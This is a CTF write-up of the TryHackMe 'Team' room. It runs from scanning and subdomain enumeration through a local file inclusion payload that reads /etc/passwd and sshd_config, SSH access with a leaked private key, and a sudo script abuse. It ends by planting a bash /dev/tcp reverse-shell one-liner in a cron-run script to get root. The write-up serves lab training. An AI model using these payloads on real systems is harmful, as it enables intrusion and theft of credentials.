TryHackMe: Team Boot2Root Write-up

Team box CTF Write-up

To access the box click on the following link and join room.

TryHackMe | Team

Check connection

Ping machine IP to check if the connection is established. In my case ping is successful so the connection is established.

Checking Connection

Scanning

Let’s start with a nmap scan. Use following command to scan the target IP address.

sudo nmap -A 10.10.30.96

The above command is using Nmap with aggressive scanning options.

• sudo It runs the nmap command with superuser privileges.
• nmap is the Nmap command-line tool for network exploration and security auditing.
• A Enables aggressive scanning options, including OS detection, version detection, script scanning, and traceroute.
• 10.10.30.96 is the IP address of the target we are scanning.

nmap scan results

Nmap scan results show that ports 21, 22, and 80 are open, it means that there are services running on these ports on the target system.

Scanning for anonymous FTP login

Ftp service is running on port 21. Let’s scan port 21 to check if anonymous login is allowed or not. Use following command to scan port 21.

nmap -p 21 --script ftp-anon 10.10.30.96

The above command is using Nmap with specific options to perform a script scan targeting port 21 (FTP) and using the ftp-anon script.

• nmap is the command-line tool for network exploration and security auditing.
• p 21 specifies the target port as 21.
• -script ftp-anon specifies the Nmap script to be executed. In this case, the ftp-anon script is used. This script checks if the FTP server allows anonymous (unauthenticated) login.
• 10.10.30.96 is the IP address of the target system.

nmap scan results for anonymous FTP login

Nmap results does not show any sign of allowed anonymous FTP login.

Visit the target IP

Let’s visit target IP address in browser and it shows only default apache2 page running on ubuntu server.

Webpage on port 80 of target IP

Override DNS resolution

We remember seeing the HTTP Title in the nmap results was Team lets add this to hosts file. Use following command to add target IP in hosts file.

sudo nano /etc/hosts

• sudo Executes the command with superuser (root) privileges, providing the necessary permissions to modify system files.
• nano Is a command-line text editor.
• /etc/hosts Is the path to the hosts file, which is a system file responsible for mapping IP addresses to hostnames.

Add target IP and assign domain team.thm as shown in the figure below. Press [Ctrl + x] to save, Press [y] for yes and hit enter. Cool!! we have a URL now.

updated /etc/hosts file

Let’s check that in browser. Use the following command in terminal to open URL in browser.

firefox team.thm

team.thm url working in browser

Our URL is working. Congratulations!!🚀

Directory Busting

Let’s start directory busting with gobuster. Use the following command for directory busting.

gobuster dir -u <http://team.thm/> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

• gobuster dir Initiates Gobuster for directory/file enumeration.
• u <http://team.thm/> Specifies the target URL to be scanned.
• w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt Specifies the wordlist (dictionary) file to be used for the brute-force attack.

Directory busting results

Directory busting results shows few directories but most of them are forbidden.

Hunt for Sub-Domains

Let’s try luck in hunting for sub-domains. Use the following command to hunt for subdomains.

sudo gobuster vhost -u <http://team.thm> -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt

• sudo runs the command with superuser privileges.
• gobuster is the name of the tool being used.
• vhost is the flag that specifies that Gobuster will perform a virtual host scan, attempting to identify subdomains or hosts associated with the target domain.
• u <http://team.thm> flag denotes the target URL for the scan.
• w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt specifies the wordlist (dictionary) to be used during the scan.

Gobuster will attempt to enumerate subdomains by trying each entry in the specified wordlist against the target URL.

Subdomain enumeration results

We found 3 subdomains. Let’s add dev.team.thm to our /etc/hosts file and visit that in browser.

sudo nano /etc/hosts

subdomain added to /etc/hosts file

Use following command to visit dev.team.thm in browser.

firefox dev.team.thm

subdomain opened in browser

The link opens up in firefox and we have another link on the page so let’s click on it.

link from dev.team.thm

As soon as the link opens we can notice that the URL is changed so let’s check if that is vulnerable to “local file inclusion”. So Let’s change the url to find passwd file in etc directory as shown below.

http://dev.team.thm/script.php?page=../../../../../etc/passwd

/etc/passwd file

We found the passwd file which shows the link is vulnerable to local file inclusion. The nmap results showed that the server is Apache, running Ubuntu flavor of linux. We know that in linux ssh_config file contains configuration settings for the SSH client. It’s used to set options that manage the behavior of SSH connections initiated from that specific client machine. So Let’s try to get that file. Use the following modified link to get that.

http://dev.team.thm/script.php?page=/etc/ssh/ssh_config

/etc/ssh/ssh_config file in browser

We got ssh_config file in browser but there’s noting special in it. Let’s hunt for sshd_config file. In linux /etc/ssh/sshd_config file is a crucial configuration file for the SSH server. It contains settings and directives that govern the behavior of the SSH daemon (sshd) running on the server. Use the following modified link to get that.

http://dev.team.thm/script.php?page=/etc/ssh/sshd_config

/etc/ssh/sshd_confg file in browser

Congratulations!!! We got sshd_config file. It contains (id_rsa) private key of dale. Interesting!! Let’s view source code of the page in browser and get that private key.

source code of particular page

Let’s copy the private key and save it on our machine. Use the following command to open nano editor in terminal.

nano id_rsa

Press CTRL + SHIFT + v to paste the copied key in nano editor.

private key

Don’t forget to remove # from beginning of each line as it is used to comment out in bash.

id_rsa after removing hashes

Press Ctrl + x and press y to save changes before hitting enter.

chmod 600 id_rsa

The command chmod 600 id_rsa sets the permissions for the id_rsa file, a common SSH private key, to read and write for the owner (user) and no permissions for any other users or groups. This is done to secure the file and prevent unauthorized access to the private key material.

setting permissions for id_rsa file

Get user flag

Now that we got private key of dale Let’s SSH into the server and hunt for user flag. Use following command to do that.

ssh -i id_rsa dale@team.thm

• ssh Initiates the SSH connection.
• i id_rsa Specifies the private key file "id_rsa" to be used for authentication. The i flag denotes the identity file.
• dale@team.thm Indicates the username "dale" and the hostname "team.thm" of the remote server.

This command attempts to authenticate the user “dale” on the server “team.thm” using the private key “id_rsa” rather than a password.

SSH into dale’s account

Boom!! we are in as dale.

Let’s verify it by using whoami command

Linux terminal

let’s use ls command to list files and directories.

listing files

We got user.txt file. Let’s cat into it and capture user flag.

user flag captured

Congratulations!!! 🎉👏🥳

Get root flag

Now that we are logged in as the user dale, we will check our privileges by running the following command:

sudo -l

It displays information about which commands or scripts a user is allowed to execute with superuser (root) privileges or as another specified user.

Results of sudo -l command

The results shows that we are allowed to see admin_checks file. Let’s use cat command to check what’s inside that file.

cat /home/gyles/admin_checks

The above command will display the contents of the file named “admin_checks” located in the “/home/gyles/” directory.

content of admin_checks file

We have a bash script in admin_checks file. This script prompts the user to enter the name of the person backing up the data and a date. It then saves this information to a stats file and creates a backup of the stats file with a timestamp in its name. $error 2>/dev/null seems to be an attempt to suppress error messages. That’s something which we can use to abuse the script. Let’s try that with the following command:

sudo -u gyles /home/gyles/admin_checks

The above command runs the script admin_checks as the user gyles with elevated privileges (using sudo). This means it executes admin_checks with the permissions and settings associated with the gyles user.

Enter any name and to produce error type bash in place of timestamp. The script hangs and type command id and hit enter. The command executes successfully and we got results. Use command whoami and hit enter to verify. The result shows we are now logged in as gyles.

privilege escalation

Let’s make the shell stable using following python command.

python -c "import pty;pty.spawn('/bin/bash')"

stable shell

We got a stable shell now. Let’s verify this using “whoami” command.

Verifying shell

Let’s list files and directories using ls -la command.

listing directories and files

I have checked the .ssh directory but found nothing interesting. Let’s move one step back in the file system with cd/ command and list files there with ls command.

listing files on the root directory

Let’s enter opt directory and check what we have got.

listing files in opt directory

We have another directory named admin_stuff. Let’s check that now.

listing files in admin_stuff

We have another bash script. Let’s check what’s inside that script. The script shows that 2 cronjobs are running to maintain backup.

viewing script.sh file

Now, Let’s check the main_backup script with cat command.

main_backup.sh script

main_backup.sh script is added in cronjob and it executes every minute. Sounds interesting!!.. We can get admin’s reverse shell with that. Let’s do this by adding following command in the bash script.

bash -i >& /dev/tcp/[host_machine_ip]/5555 0>&1

The above command is bash one-liner used for creating a reverse shell. This command attempts to establish a connection to a specified IP address on port 5555 and provide an interactive shell back to that IP. Use ifconfig command to check the host machine ip.

result of ifconfig command

Open main_backup.sh script with nano editor and add one liner command in it. Don’t forget to add IP and port number.

One liner added to main_backup script

Press Ctrl + x then press y to save changes and hit enter to exit.

Let’s start listner on our host machine to get the shell. Use following command for that.

nc -lvp 5555

Starting listener on port 5555

The command nc -lvp 5555 sets up netcat to listen for incoming connections on port 5555 with verbose output.

Now, wait for one minute as the script was added in cronjob and will execute every minute.

Reverse shell

Boom!! Here we go……. we have reverse shell now🎉

Let’s use ls command to list the files and we have root.txt file.

listing files

We can capture the root flag by using cat command.

Root flag captured

Paste the user and root flag on tryhackme and submit the answers.

CONGRATULATIONS!!! The room is completed!

This walkthrough finishes here. Stay tuned for the next adventure! 🚀😊